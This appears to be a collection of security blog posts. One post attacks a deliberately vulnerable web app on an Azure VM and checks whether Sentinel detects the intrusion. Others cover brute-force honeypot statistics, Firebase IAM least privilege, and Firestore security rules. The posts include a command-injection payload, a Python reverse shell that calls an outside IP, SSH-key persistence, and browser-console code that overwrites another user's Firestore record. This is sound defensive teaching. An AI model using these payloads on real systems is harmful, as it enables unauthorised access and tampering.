Can Chuck Norris detect the hackers in his home folder?

Let’s set up a server to run Vulnerable Norris. An attacker discovers that the web application has a remote command injection vulnerability, and exploits it to gain a reverse shell. The attacker then copies their own SSH public key onto the server, and uses it as a foothold in the network. How can we detect and stop this from happening, even if we don’t know that the application itself has a vulnerability?

Here’s a summary of attack activities in different phases from the Lockheed-Martin kill-chain model. We will see that a lot of these opportunities for detection are not used out of the box in typical security tooling, and that an attacker can be relatively blunt in the choice of methods without creating alerts.

Phase | Attacker’s actions | Artifacts produced
Recon | Endpoint scanning, spidering, payload probing | Access logs, application logs
Weaponization | Plan reverse shell to use | Application logs
Delivery | Payload submitted through application’s injection point | Command line input
Exploitation | Command line input, create reverse shell | Network traffic, audit logs
Installation | Webshell injection, add SSH keys | Changed files on system
Command and control | Use access method established to perform actions | Network connections, audit logs
Actions on objective | Software installation, network reconnaissance, data exfiltration | Network connections, audit logs
Attack phases and expected artifacts generated

Deploying on an Azure Linux VM

We will deploy Vulnerable Norris on a Linux VM on Azure. Our detection strategy is to enable recommended security tooling in Azure, such as Microsoft Defender for Cloud, and to forward Syslog data to Sentinel. It is easy to think that an attack like the one above would light up with alerts relatively early, but as we will see this is not the case, at least not out of the box.

First we deploy a VM using the Azure CLI.

az vm create --name victimvm --resource-group security-experiments --location norwayeast --image UbuntuLts --admin-username donkeyman --generate-ssh-keys

Now we have a standard VM with SSH access. By default it has port 22 open for SSH access. We will open another port for the application:

az vm open-port --name victimvm -g security-experiments --port 3000

We remote into the server with

ssh donkeyman@<ip-address-here>

Then we pull the Vulnerable Norris app in from GitHub and install it according to the README description. We need to install a few dependencies first:

sudo apt install npm jq

git clone https://github.com/hakdo/vulnerablenorris.git

cd vulnerablenorris

npm install

node index.js &

OK, our server is up and running at <ip-address>:3000.

Turning on some security options

Let’s enable Defender for Cloud. According to the documentation, this should:

  • Provide continuous assessment of security posture
  • Make recommendations for hardening – with a convenient “fix now” button
  • Detect threats to your resources and workloads, when the enhanced security features are enabled

This sounds awesome – with the flick of a switch our Norris should be pretty secure, right?

Turns out there are more switches: you can turn on an EDR component called Defender for Servers. That’s another switch to flick. It is not always clear when you have enabled enough features to be “safe enough”, and each new service enabled will add to the bill.

A very basic security measure that we have turned on is to forward syslog to a SIEM. We are using Microsoft Sentinel for this. This allows us to create alerts based on log findings, as well as to search the logs through a simple interface, without logging on to the actual VM. Alerts from Defender for Cloud are also set up to be forwarded to Sentinel, so an incident can be managed from both places and will synchronize.

The attack

The attacker comes from another planet – or at least another cloud. We are setting up a VM in Google Cloud. We will use this one to stage the attack by first setting up a listener to receive a reverse shell from our VictimVM. Then we will generate SSH keys on the attacker’s server, and add the public key from here to VictimVM. Now we can log in over SSH from the GCP VM to VictimVM on Azure whenever we want. The key questions are:

  • Does Defender for Cloud stop us?
  • Does it at least create an alert for us?

We temporarily got the service up and running, exposing port 3000.

Vulnerable app running in an Azure VM.

Going to the app gives us a Chuck Norris fact from the Chuck Norris API. We have deliberately implemented this very poorly: at the endpoint /dangerzone, the web application calls the API by running curl through a system call. This endpoint has a parsing error that allows command injection.

Norris app with demo of remote command injection using “whoami”

The payload is

/dangerzone?category=fashion%26%26whoami

The output shows that we have command injection, and that the app is running as the user donkeyvictim. Now we can get a reverse shell to secure more convenient access to the box. We have set up the attacker’s VM to listen on port 3000, and use the following reverse shell payload generated by Online – Reverse Shell Generator (revshells.com):

python3%20-c%20'import%20os,pty,socket;s=socket.socket();s.connect((%2234.88.132.129%22,3000));%5Bos.dup2(s.fileno(),f)for%20f%20in(0,1,2)%5D;pty.spawn(%22sh%22)'

On the GCP VM we get an incoming connection:

Simple reverse shell received using netcat listener

Running ls shows that we are indeed in a reverse shell, but it is very crude. We can upgrade the shell using a neat Python trick from this page:

python3 -c 'import pty;pty.spawn("/bin/bash")'

The blog I took this from has a lot of tweaks you can do to get full autocomplete and more through the netcat listener, but this will do for a slightly nicer experience.

What we now do on the attacker VM is to generate an SSH keypair. We then copy the public key to the authorized_keys file for user donkeyvictim on the VictimVM using our reverse shell. We now have established a persistent access channel.

Upgraded shell: the attacker’s console on GCP cloud shell, connected to VictimVM on Azure over SSH.

We obviously see that this activity was not stopped by Microsoft’s Defender for Cloud. But did it at least create some alerts for us? It seems the answer to that is “nope”.

If we turn to Microsoft Sentinel, there are also no incidents or alerts related to this activity.

Checking the logs

Can we then see it in the logs? We know at least that authentication events over SSH will create auth log entries. Since we have set up the Syslog connector in Sentinel, we get the logs into a tool that makes searching easier. The following search will reveal which IP addresses have authenticated with a publickey, and the username it has authenticated with.

Syslog
| where Computer == "victimvm"
| where SyslogMessage contains "Accepted publickey for"
// Extract the source IPv4 address (dots escaped so they match literally)
| extend ip = extract(@"([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)", 1, SyslogMessage)
// Extract the username that authenticated
| extend username = extract("publickey for ([a-zA-Z0-9@!]+)", 1, SyslogMessage)
| project TimeGenerated, username, ip

The output from this search is as follows:

Showing the same user logging in with ssh from two different ip addresses.

Here we see that the same user is logging in from two different IP addresses. Enriching it with geolocation data could make the suspicious login easier to detect, as the 212… address is in Norway, and the 34… address is a Google-owned IP address in Finland.

In other words: it is possible to detect unusual login activity by creating queries in Sentinel. At least it is something.
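The same check can be sketched outside Sentinel. The following JavaScript is only an illustration, assuming the log lines follow the usual OpenSSH format "Accepted publickey for <user> from <ip> port ...". The function names and the sample lines are made up for the example, and the IP addresses are documentation ranges.

```javascript
// Sketch: find users who authenticated with a public key from more than one IP.
// Assumes OpenSSH-style auth log lines; the sample data below is hypothetical.
const ACCEPTED = /Accepted publickey for (\S+) from (\d{1,3}(?:\.\d{1,3}){3})/;

function loginsByUser(lines) {
  const seen = new Map(); // username -> Set of source IPs
  for (const line of lines) {
    const m = ACCEPTED.exec(line);
    if (!m) continue; // not a successful public key login
    const [, user, ip] = m;
    if (!seen.has(user)) seen.set(user, new Set());
    seen.get(user).add(ip);
  }
  return seen;
}

function usersWithMultipleIps(lines) {
  return [...loginsByUser(lines)]
    .filter(([, ips]) => ips.size > 1)
    .map(([user, ips]) => ({ user, ips: [...ips] }));
}

const sampleLines = [
  "sshd[1201]: Accepted publickey for alice from 192.0.2.10 port 50122 ssh2",
  "sshd[1310]: Accepted publickey for alice from 198.51.100.7 port 40022 ssh2",
  "sshd[1422]: Accepted publickey for bob from 192.0.2.10 port 50190 ssh2",
];
console.log(usersWithMultipleIps(sampleLines));
```

A user appearing with several source addresses is not proof of compromise, but it is a cheap signal to review, especially when one of the addresses belongs to an unexpected network.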

How could we have detected the attack?

But what about all the things leading up to the SSH login? We should definitely be able to stop this at an earlier point. There are at least three earlier events we could look for:

  1. The payload sent to the application
  2. The network egress when the reverse shell is generated
  3. The change of the ~/.ssh/authorized_keys file

Because the application does not log messages anywhere but stdout, the payloads sent to it are not captured anywhere. It would have been good if the application logged issues to a standard location that could be forwarded.

Detecting the attack when the reverse shell is generated is a good option. Here we can use the VMConnection data provided by the Defender for Cloud agent running on the VM.

VMConnection
| where Computer has "victimvm"
| where Direction == "outbound"
| summarize count() by DestinationPort

Here we look at which destination ports we see in egress traffic. Reverse shells will often use listener ports that do not require root privileges, i.e. port 1024 and above.

Count of outbound connections per destination port

We see we have outbound connections to port 3000. Looking into one of the log items we find some interesting information:

TimeGenerated [UTC]: 2022-01-18T19:58:20.211Z
Computer: victimvm
Direction: outbound
ProcessName: python3
SourceIp: 10.0.0.4
DestinationIp: 34.88.132.129
DestinationPort: 3000
Protocol: tcp
RemoteIp: 34.88.132.129
RemoteLongitude: 28.21
RemoteLatitude: 61.03
RemoteCountry: Finland

We know that this is our reverse shell. We could then correlate the outbound connection to this IP address with later incoming SSH connection from this IP address. For relatively specific attack events we can in other words create detections. However, we don’t know in advance what persistence option the attacker would go for, or the port number used for the reverse shell.
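The correlation idea can be sketched in a few lines of JavaScript. This is only an illustration: the record shapes (time, destinationIp, sourceIp, user) are assumptions for the example rather than the Sentinel schema. The outbound record reuses the values from the log item above, while the login records are made up.

```javascript
// Sketch: flag SSH logins coming from an IP address that the VM had earlier
// connected out to. Field names are assumptions chosen for this example.
function correlate(outbound, sshLogins) {
  // Earliest outbound connection time per destination IP
  const firstOutbound = new Map();
  for (const c of outbound) {
    const t = Date.parse(c.time);
    const prev = firstOutbound.get(c.destinationIp);
    if (prev === undefined || t < prev) firstOutbound.set(c.destinationIp, t);
  }
  // Keep logins whose source IP was an earlier outbound destination
  return sshLogins.filter((l) => {
    const t0 = firstOutbound.get(l.sourceIp);
    return t0 !== undefined && Date.parse(l.time) > t0;
  });
}

const outboundSample = [
  { time: "2022-01-18T19:58:20.211Z", destinationIp: "34.88.132.129", port: 3000, process: "python3" },
];
// Hypothetical login events for illustration
const loginSample = [
  { time: "2022-01-18T20:05:00.000Z", sourceIp: "34.88.132.129", user: "donkeyvictim" },
  { time: "2022-01-18T20:10:00.000Z", sourceIp: "192.0.2.10", user: "donkeyman" },
];
console.log(correlate(outboundSample, loginSample));
```

In practice the outbound list would need filtering first, since servers legitimately connect to package mirrors and APIs; an allow-list of expected destinations is one way to keep the noise down.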

A good idea would be to list the scenarios we would want to detect, and then build logging practices and correlations to help us create alerts for these incidents.

Can we throw more security at the VM to detect and stop attacks?

One thing Azure supports for VMs, if Defender for Cloud is enabled with “enhanced security”, is “just-in-time access”. With this enabled, inbound traffic to management ports is blocked in the network security group until access has been pre-authorized. The result of trying to connect with SSH after enabling it is a timeout:

After enabling JIT access, our SSH connection times out without pre-approval.

We can now request access over SSH in Azure Portal by going to the VM’s overview page, and then selecting “connect”:

Pre-authorizing SSH access enables it for a defined period.

This will effectively stop an attacker’s persistence tactic but it will not take care of the remote command injection vulnerability.

For a web application we could also put a web application firewall in front of it to reduce the malicious payloads reaching the app. Even better is of course to only run code that has been developed with security in mind.
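As a minimal sketch of what “developed with security in mind” could mean for this endpoint: validate the category against an allow-list and never build a shell command string from user input. The code below is not taken from the Vulnerable Norris source. The category list and the API URL are assumptions for illustration, and buildCurlArgs is a hypothetical helper.

```javascript
// Sketch: allow-list validation plus an argument vector instead of a shell string.
// ALLOWED_CATEGORIES and API_URL are assumptions, not the app's actual values.
const ALLOWED_CATEGORIES = new Set(["dev", "fashion", "movie", "science"]);
const API_URL = "https://api.chucknorris.io/jokes/random";

function buildCurlArgs(category) {
  if (typeof category !== "string" || !ALLOWED_CATEGORIES.has(category)) {
    throw new Error("unknown category");
  }
  const url = new URL(API_URL);
  url.searchParams.set("category", category); // URL-encodes the value
  return ["--silent", "--max-time", "5", url.toString()];
}

console.log(buildCurlArgs("fashion"));
try {
  buildCurlArgs("fashion&&whoami"); // the payload used in the attack
} catch (err) {
  console.log("rejected:", err.message);
}
```

If curl must be used at all, passing such an array to child_process.execFile avoids invoking a shell, so characters like && have no special meaning. Calling the API with an HTTP client from within Node would remove the system call entirely.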

The key takeaways are:

  1. Log forwarding is gold but you have to use it and set up your own alerts and correlations to make it help stop attacks
  2. Enabling security solutions will help you but it will not take care of security for you. Setting up endpoint security won’t help you if the application code you are running is the problem.
  3. Avoid exposing management ports directly on the internet if possible.

Bears out for honey in the pot: some statistics

This weekend I decided to do a small experiment: create two virtual machines in the cloud, one running Windows and one running Linux. The Windows machine exposes RDP (port 3389) to the internet. The Linux machine exposes SSH (port 22). The Windows machine sees more than 10x the brute-force attempts of the Linux machine.

We capture logs, and watch the logon attempts. Here’s what I wanted to find out: 

  • How many login attempts do we have in 24 hours?
  • What usernames are the bad guys trying with?
  • Where are the attacks coming from?
  • Is there a difference between the two virtual machines in terms of attack frequency?

The VMs were set up in Azure, so it was easy to instrument them using Microsoft Sentinel. This makes it easy to query the logs and create some simple statistics.

Where are the bad bears coming from?

Let’s first have a look at the login attempts. Are all the hackers Russian bears, or are they coming from multiple places? 

Windows

On Windows we observed more than 30,000 attempts over 24 hours. The distribution of attacks shows that the majority came from Germany, then Belarus, followed by Russia and China. We also see that there are some attempts from many countries, all around the globe.

Logon attempts on a Windows server over 24 hours

Linux

On Linux the situation is similar, although the Chinese bad guys are a lot more intense than the rest of them. We don’t see that massive amount of attacks from Germany on this VM. It is also less popular to attack the Linux VM: only 3000 attempts over 24 hours, about 10% of the number of login attempts observed on the Windows VM. 

Logon attempts on a Linux server over 24 hours

What’s up with all those German hackers?

The German hackers are probably neither German nor human. These login attempts are coming from a number of IP addresses known to belong to a botnet. That is, these are computers in Germany infected with a virus.

Usernames fancied by brute-force attackers

What are the usernames that attackers are trying to log in with? 

Top 5 usernames on Linux:

Top 5 usernames on Windows: 

We see that “admin” is a popular choice on both servers, which is perhaps not so surprising. On Linux the attackers seem to try a lot of typical service names, for example “ftp” as shown above. Here’s a collection of usernames seen in the logs: 

  • zabbix
  • ftp
  • postgres
  • ansible
  • tomcat
  • git
  • dell
  • oracle1
  • redmine
  • samba
  • elasticsearch
  • apache
  • mysql
  • kafka
  • mongodb
  • sonar

Perhaps it is a good idea to avoid service names as account names, although the username itself is not a protection against unauthorized access. 

There is a lot less of this in the Windows login attempts; here we primarily see variations of “administrator” and “user”. 
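For the Linux side, a username ranking like the one above can be sketched in JavaScript from raw auth log lines. This is an illustration only, assuming OpenSSH-style “Failed password for [invalid user] <name> from <ip>” messages. The function name and the sample lines are hypothetical.

```javascript
// Sketch: count the usernames seen in failed SSH password attempts.
// Assumes OpenSSH-style messages; the sample lines below are made up.
const FAILED = /Failed password for (?:invalid user )?(\S+) from /;

function topUsernames(lines, n = 5) {
  const counts = new Map(); // username -> number of failed attempts
  for (const line of lines) {
    const m = FAILED.exec(line);
    if (m) counts.set(m[1], (counts.get(m[1]) || 0) + 1);
  }
  // Sort by count (descending), then alphabetically for stable output
  return [...counts.entries()]
    .sort((a, b) => b[1] - a[1] || a[0].localeCompare(b[0]))
    .slice(0, n);
}

const failedSample = [
  "Failed password for invalid user admin from 203.0.113.5 port 4242 ssh2",
  "Failed password for invalid user ftp from 203.0.113.5 port 4243 ssh2",
  "Failed password for root from 198.51.100.9 port 5151 ssh2",
  "Failed password for invalid user admin from 198.51.100.9 port 5152 ssh2",
];
console.log(topUsernames(failedSample));
```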

Tips for avoiding brute-force attackers

The most obvious way to avoid brute-force attacks from the Internet, is clearly to not put your server on the Internet. There are many design patterns that allow you to avoid exposing RDP or SSH directly on the Internet. For example:

  • Only allow access to your server from the internal network, and set up a VPN solution with multi-factor authentication to get onto the local network remotely
  • Use a bastion host solution, where access to this host is strictly controlled
  • Use an access control solution that gives access through short-lived tokens, requiring multi-factor authentication for token access. Cloud providers have services of this type, such as just-in-time access on Azure or OS Login on GCP.

Firebase IAM: the tale of excessive permissions

Securing Firestore objects from attacks abusing the JavaScript SDK can be done with the Firestore security rules, which you can read about in my recent post on Firestore.

If you are using the Admin SDK on the server side, you have full access to everything by default. The Firestore security rules do not apply to the Admin SDK. One thing in particular we should be aware of is that the Firebase Admin SDK gives access to management plane functionality, making it possible to change security rules, for example. This is not apparent from the Firebase console or command line tools.

Running Firebase Cloud Functions using the Admin SDK with default permissions can quickly lead to a lot of firefighting. Better get those permissions under control!

In this blog post we dig into a Firebase project through the Google Cloud console and the gcloud command line tool, where we show how to improve the security of our capture-the-flag app by creating specific service accounts and role bindings for a cloud function. We also explore how to verify that a user is signed in using the Firebase Admin SDK.

A threat model for the flag checker

We have created a demo Firebase project with a simple web application at https://quizman-a9f1b.web.app/. This app has a simple CTF function, where a CTF challenge is presented, and players can verify if their identified flag is correct. The data exchange is primarily done using the JavaScript SDK, protected by security rules. For checking the flag, however, we are using a cloud function. If this cloud function has a vulnerability that allows an attacker to take control over it, that attacker could potentially overwrite the “correct flag”, or even change the security rules protecting the JavaScript SDK access. 

Here’s a list of threats and potential consequences: 

Vulnerability | Exploitation | Impact
RCE vulnerability in code | Attacker can take full control of the Firebase project environment through the admin SDK | Can read/write to private collection (cheat); can create other resources (costs money); can reconfigure security rules (data leaks or DoS)
Lack of brute-force protection | Attacker can try to guess flags by automating submission | User can cheat; costs money
Lack of authentication | An unauthenticated user can perform function calls | Costs money in spite of not being a real player of the CTF game

We need to make sure that attackers cannot exploit vulnerabilities to cheat in the program. We also want to protect against unavailability, and abuse that can drive up the cloud usage bill (after all this is a personal project). We will apply a defence-in-depth approach to our cloud function: 

  1. Execution of the function requires the caller to be authenticated. The purpose of this is to limit abuse, and to revoke access to users abusing the app. 
  2. The Firebase function shall only have read access to Firestore, preferably only to the relevant collections. This will prevent an attacker with RCE from overwriting data or managing resources in the Firebase project.
  3. For the following events we want to create logs and possibly alerts: 
    1. authenticated user verified token
    2. unauthenticated user requested token verification

Requiring the user to be authenticated

First we need to make sure that the person requesting to verify a flag is authenticated. We can use a built-in method of the Firebase admin SDK to do this. This method checks that the ID token received is properly signed, and that it is not expired. The good thing about this approach is that it avoids making a call to the authentication backend.

But what if the token has been revoked? It is possible to check if a token is revoked using either security rules (recommended, cheap), or by making an extra call to the authentication backend (expensive, not recommended). Since we are not actively revoking tokens in this app, unless a user changes their password, we will not bother with this functionality. If you need it, it is documented here: https://firebase.google.com/docs/auth/admin/manage-sessions#detect_id_token_revocation

We need to update our “check flag workflow” from this: 

  • send flag and challenge ID to cloud function
  • cloud function queries Firestore based on challenge ID and gets the “correct flag”
  • cloud function compares submitted flag with the correct flag, and returns {success: true/false} as appropriate

to this slightly more elaborate workflow:

  • send flag, challenge ID and user token to cloud function
  • cloud function verifies the ID token
    • If invalid: return 403 (forbidden) // simplified to returning 200 with {success: false}
    • if valid: 
      • cloud function queries Firestore based on challenge ID and gets the “correct flag”
      • cloud function compares submitted flag with the correct flag, and returns {success: true/false} as appropriate

The following code snippet shows how to perform the validation of the user’s token: 

const idTokenResult = await admin.auth().verifyIdToken(idToken);

If the token is valid, we receive a decoded JWT back.
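The updated workflow can be sketched as follows. This is not the actual cloud function: the token verifier and the Firestore lookup are injected as plain functions (hypothetical names verifyToken and getCorrectFlag) so the logic can run without Firebase. In a real function they would wrap admin.auth().verifyIdToken and a Firestore read.

```javascript
// Sketch of the flag-check workflow with token verification first.
// verifyToken and getCorrectFlag are stand-ins for the Firebase calls.
async function checkFlag({ idToken, challengeId, flag }, { verifyToken, getCorrectFlag }) {
  let decoded;
  try {
    decoded = await verifyToken(idToken); // rejects on bad signature or expiry
  } catch (err) {
    console.log("unauthenticated flag check rejected");
    return { success: false }; // simplified: no 403, as described above
  }
  console.log(`flag check requested by uid ${decoded.uid}`);
  const correct = await getCorrectFlag(challengeId);
  return { success: correct !== undefined && flag === correct };
}

// Fake dependencies, for demonstration only
const fakeDeps = {
  verifyToken: async (token) => {
    if (token !== "valid-token") throw new Error("invalid token");
    return { uid: "user-123" };
  },
  getCorrectFlag: async (id) => ({ "challenge-1": "flag{demo}" }[id]),
};

checkFlag({ idToken: "valid-token", challengeId: "challenge-1", flag: "flag{demo}" }, fakeDeps)
  .then((result) => console.log(result));
checkFlag({ idToken: "forged", challengeId: "challenge-1", flag: "flag{demo}" }, fakeDeps)
  .then((result) => console.log(result));
```

The two log statements correspond to the events we said we wanted to record: a verified user checking a flag, and an unauthenticated request being turned away.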

Restricting permissions using IAM roles

By default, a Firebase function initialized with the Firebase Admin SDK has been assigned very powerful permissions. It is automatically set up with a service account named “firebase-adminsdk-random5chars@project-id.iam.gserviceaccount.com”. The service account itself does not have rights associated with it, but it has role bindings to roles that have permissions attached to them. 

If you go into the Google Cloud Console, and navigate to “IAM” under your project, you can look up the roles assigned to a principal, such as your service account. For each role you automatically get an assessment of “excess permissions”; those are permissions available through the role bindings but that are not used in the project. Here’s the default configuration for the service account set up for the Admin SDK: 

By default Firebase Cloud Functions run with excessive permissions!

Our Firebase cloud function does not need access to all those permissions. By creating roles that are fit for purpose we can limit the damage an attacker can do if the function is compromised. This is just the same principle in action as when your security awareness training tells you not to run your PC as admin for daily work. 

Cloud resources have associated ready-made roles that one can bind a service account to. For Firestore objects the relevant IAM roles are listed here: https://cloud.google.com/firestore/docs/security/iam. We see that there is a viewer role that allows read access to all Firestore resources, called datastore.viewer. We will use this, but be aware it could read all Firestore data in the project, not only the intended objects. Still, we are protecting against deletion, overwriting data, and creation of new resources. 

Note that it is possible to create more specific roles. We could create a role that only has permission to read from Firestore entities. We cannot in an IAM role describe exactly which Firestore collection to allow read operations from, but if we create the role flagchecker and assign it the permission datastore.entities.get and nothing else, it is as locked down as we can make it. 

To implement this for our cloud function, we create a new service account. This can be done in the Console by going to IAM → Service Accounts → New Service Account. We create the account and assign it the role datastore.viewer. 

Our new service account is called quizman-flag-checker.

Now we need to attach this service account to our Firebase function. It is not clear from the Firebase documentation how we can accomplish this, but by opening the Google Cloud Console, or using the gcloud command line tool, we can attach our new service account with more restrictive permissions to the Firebase function. 

To do this, we go into the Google Cloud console, choose the right project and Compute → Cloud functions. Select the right function, and then hit the “edit” button to change the function. Here you can choose the service account you want to attach to the function. 

google cloud console

After changing the runtime service account, we need to deploy the function again. Now the service-to-service authentication is performed with a principal with more sensible permissions; attackers can no longer create their own resources or delete security rules. 

Auditing the security configurations of a Firebase function using gcloud

Firebase is great for an easy set-up, but as we have seen it gives us too permissive roles by default. It can therefore be a good idea to audit the IAM roles used in your project. 

Key questions to ask about the permissions of a cloud function are: 

  • What is the service account this function is authenticating as?
  • What permissions does this cloud function have through that service account?
  • Do I have permissions that I do not need? 

In addition to auditing the configuration, we want to audit changes to the configuration, in particular changes to service accounts, roles, and role bindings. This is easiest done using the log viewer tools in the Google Cloud console. 

We’ll use the command line tool gcloud for the auditing, since this makes it possible to automate in scripts. 

Service accounts and IAM roles for a Firebase function

Using the Google Cloud command line tool gcloud we can use the command 

gcloud functions describe <functionName>

to get a lot of metadata about a function. To extract just the service account used you can pipe it into jq like this: 

gcloud functions describe <functionName> --format="json" | jq ".serviceAccountEmail"

When we have the service account, we can next check which roles are bound to the account. This query is somewhat complex due to the nested data structure for role bindings on a project (for a good description of gcloud IAM queries, see fabianlee.org): 

gcloud projects get-iam-policy <projectIdNumber> --flatten="bindings[].members" --filter="bindings.members=serviceAccount:<account-email>" --format="value(bindings.role)"

Running this gives us the following role (as expected): projects/quizman-a9f1b/roles/flagchecker.

Hence, we know this is the only role assigned to this service account. Now we finally need to list the permissions for this role. Here’s how we can do that: 

gcloud iam roles describe flagchecker --project=quizman-a9f1b --format="value(includedPermissions)"

The output (as expected) is a single permission: datastore.entities.get
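If the policy is exported as JSON instead (gcloud projects get-iam-policy with --format=json), the same audit can be scripted. The sketch below assumes the standard policy layout with a bindings array of role and members. The sample policy, the expected-role list, and the full service account email are made up for the example.

```javascript
// Sketch: list the roles bound to a member in an exported IAM policy and
// report any that are not on an expected list. Sample data is hypothetical.
function rolesForMember(policy, member) {
  return (policy.bindings || [])
    .filter((b) => (b.members || []).includes(member))
    .map((b) => b.role)
    .sort();
}

function unexpectedRoles(policy, member, expected) {
  const allowed = new Set(expected);
  return rolesForMember(policy, member).filter((role) => !allowed.has(role));
}

const samplePolicy = {
  bindings: [
    {
      role: "projects/quizman-a9f1b/roles/flagchecker",
      members: ["serviceAccount:quizman-flag-checker@quizman-a9f1b.iam.gserviceaccount.com"],
    },
    { role: "roles/owner", members: ["user:owner@example.com"] },
  ],
};
const member = "serviceAccount:quizman-flag-checker@quizman-a9f1b.iam.gserviceaccount.com";

console.log(rolesForMember(samplePolicy, member));
console.log(unexpectedRoles(samplePolicy, member, ["projects/quizman-a9f1b/roles/flagchecker"]));
```

Run on a schedule, a check like this would surface a new role binding for the function’s service account that nobody intended.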

Firebase: Does serverless mean securityless?

Do you like quizzes or capture the flag (CTF) exercises? Imagine we want to build a platform for creating a capture the flag exercise! We need the platform to present a challenge. When users solve the challenge, they find a “flag”, which can be a secret word or a random string. They should then be able to submit the flag in our CTF platform and check if it is correct or not. 

Capture the flag can be fun: looking for a hidden flag whether physically or on a computer

To do this, we need a web server to host the CTF website, and we need a database to store challenges. We also need some functionality to check if we have found the right flag. 

Firebase is a popular collection of serverless services from Google. It offers various easy to use solutions for quickly assembling applications for web or mobile, storing data, messaging, authentication, and so on. If you want to set up a basic web application with authentication and data storage without setting up backends, it is a good choice. Let’s create our CTF proof-of-concept on Firebase using Hosting + Firestore for data storage. Fortunately for us, Google has created very readable documentation for how to add Firebase to web projects.

Firestore is a serverless NoSQL database solution that is part of Firebase. There are basically two ways of accessing the data in Firestore: 

  • Directly from the frontend. The data is protected by Firestore security rules
  • Via an admin SDK meant for use on a server. By default the SDK has full access to everything in Firestore

We don’t want to use a server, so we’ll work with the JavaScript SDK for the frontend. Here are the user stories we want to create: 

  • As an organizer I  want to create a CTF challenge in the platform and store it in Firebase so other users can find it and solve the challenge
  • As a player I want to view a challenge so that 
  • As a player I want to create a form to submit a flag to check that it is correct

Diagrams for the user stories are shown below.

User stories for a simple CTF app example

What about security?

Let’s think about how attackers could abuse the functionalities we are trying to create. 

Story 1: Create a challenge

For the first story, the primary concern is that nobody should be able to overwrite a challenge, including its flag. 

Each challenge gets a unique ID. That part is taken care of by Firestore automatically, so an existing challenge will not be overwritten by coincidence. But the ID is exposed in the frontend, and so is the project metadata. Could an attacker modify an existing record, for example its flag, by sending a “PUT” request to the Firestore REST API?

Let’s say we have decided a user must be authenticated to create a challenge, and implemented this with the following Firebase security rule:

match /challenges/{challenges} {
      allow read, write: if request.auth != null;
}

Hacking the challenge: overwriting data

This says nothing about overwriting existing data. It also has no restriction on what data the logged in user has access to – you can both read and write to challenges, as long as you are authenticated. Here’s how we can overwrite data in Firestore using set.

Of course, we need to test that! We have created a simple example app. You need to log in (you can register an account if you want to), and go to this story description page: https://quizman-a9f1b.web.app/challenges/challenge.html#wnhnbjrFFV0O5Bp93mUV

screenshot

This challenge has the title “Fog” and description “on the water”. We want to hack this as another user directly in the Chrome dev tools to change the title to “Smoke”. Let’s first register a new user, cyberhakon+dummy@gmail.com and log in. 

If we open devtools directly, we cannot find Firebase or similar objects in the console. That is because the implementation uses SDK v.9 with browser modules, which keeps the JavaScript objects contained within the module. We therefore need to import the necessary modules ourselves. We’ll first open “view source” and copy the Firebase metadata. 

const firebaseConfig = {
            apiKey: "<key>",
            authDomain: "quizman-a9f1b.firebaseapp.com",
            projectId: "quizman-a9f1b",
            storageBucket: "quizman-a9f1b.appspot.com",
            messagingSenderId: "<id>",
            appId: "<appId>",
            measurementId: "<msmtId>"
        };

We’ll simply paste this into the console while on our target challenge page. Next we need to import Firebase to interact with the data using the SDK. We could use SDK v.8 that is namespaced, but we can stick to v.9 using dynamic imports, which work directly in the Chrome console: 

import('https://www.gstatic.com/firebasejs/9.6.1/firebase-app.js').then(m => firebase = m)

and 

import('https://www.gstatic.com/firebasejs/9.6.1/firebase-firestore.js').then(m => firestore = m)

Now firestore and firebase are available in the console. 

First, we initialize the app with var app = firebase.initializeApp(firebaseConfig), and the database with var db = firestore.getFirestore(). Next we pull information about the challenge we are looking at: 

var mydoc = firestore.doc(db, "challenges", "wnhnbjrFFV0O5Bp93mUV");
var docdata = await firestore.getDoc(mydoc);

This works well. Here’s the data returned: 

  • access: “open”
  • active: true
  • description: “on the water”
  • name: “Fog”
  • owner: “IEiW8lwwCpe5idCgmExLieYiLPq2”
  • score: 5
  • type: “ctf”

That is also as intended, as we want all users to be able to read about the challenges. But we can probably use setDoc as well as getDoc, right? Let’s try to change the title from “Fog” to “Smoke”. We use the following command in the console: 

var output = await firestore.setDoc(mydoc, {name: "Smoke"}, {merge: true})

Note the option “merge: true”. Without this, setDoc would overwrite the entire document. Refreshing the page now yields the intended result for the hacker!

screenshot

Improving the security rules

Obviously this is not good security for a very serious capture-the-flag app. Let’s fix it with better security rules! Our current rules allow anyone who is authenticated to read data, but also to write data. Write here is shorthand for create, update, and delete! That means that anyone who is logged in can also delete a challenge. Let’s make sure that only the owner can modify documents. We keep the rule allowing any logged-in user to read, but change the rule for writing to the following:

Safe rule against malicious overwrite:

allow write: if request.auth != null && request.auth.uid == resource.data.owner;

This means that the authenticated user’s UID must match the “owner” field in the existing challenge document. 

Note that the documentation here shows a method that is not safe – these security rules can be bypassed by any authenticated user: https://firebase.google.com/docs/firestore/security/insecure-rules#content-owner-only

(Read 4 January 2022)

Using the following security rules will allow anyone to create, update and delete data because the field “author_uid” can be edited in the request directly. The comparison should be done as shown above, against the existing data for update using resource.data.<field_name>. 

service cloud.firestore {
  match /databases/{database}/documents {
    // Allow only authenticated content owners access
    match /some_collection/{document} {
      allow read, write: if request.auth != null && request.auth.uid == request.resource.data.author_uid
    }
  }
}
// Example from link quoted above

There is, however, a problem with the rule labeled “Safe rule against malicious overwrite” too: it will deny creation of new challenges, because there is no existing document (and thus no resource.data.owner) to compare against when a document is created. We thus need to split the write condition into two new rules, one for create (for any authenticated user), and another one for update and delete operations. 

The final rules are thus: 

allow read, create: if request.auth != null;
allow update, delete: if request.auth != null && request.auth.uid == resource.data.owner;
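
The difference between comparing against the incoming data and the stored data can be illustrated with a small sketch in plain JavaScript. This is not the Firestore rules engine: unsafeRule and safeRule are hypothetical stand-ins, where existing plays the role of resource.data and incoming the role of request.resource.data.

```javascript
// Hypothetical stand-ins for the two rule conditions (not the Firestore rules engine).
// `existing` plays the role of resource.data, `incoming` of request.resource.data.
function unsafeRule(uid, existing, incoming) {
  // compares against data the client controls
  return uid !== null && uid === incoming.owner;
}

function safeRule(uid, existing, incoming) {
  // compares against data already stored in the database
  return uid !== null && existing !== null && uid === existing.owner;
}

const stored = { name: "Fog", owner: "alice-uid" };
// The attacker sets the owner field to their own UID in the update request.
const maliciousUpdate = { name: "Smoke", owner: "mallory-uid" };

console.log(unsafeRule("mallory-uid", stored, maliciousUpdate));  // true: update allowed
console.log(safeRule("mallory-uid", stored, maliciousUpdate));    // false: update denied
console.log(safeRule("alice-uid", null, { owner: "alice-uid" })); // false: create denied
```

The last call shows why create needs its own rule: there is no stored document to compare against yet.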

Story 2: Read the data for a challenge

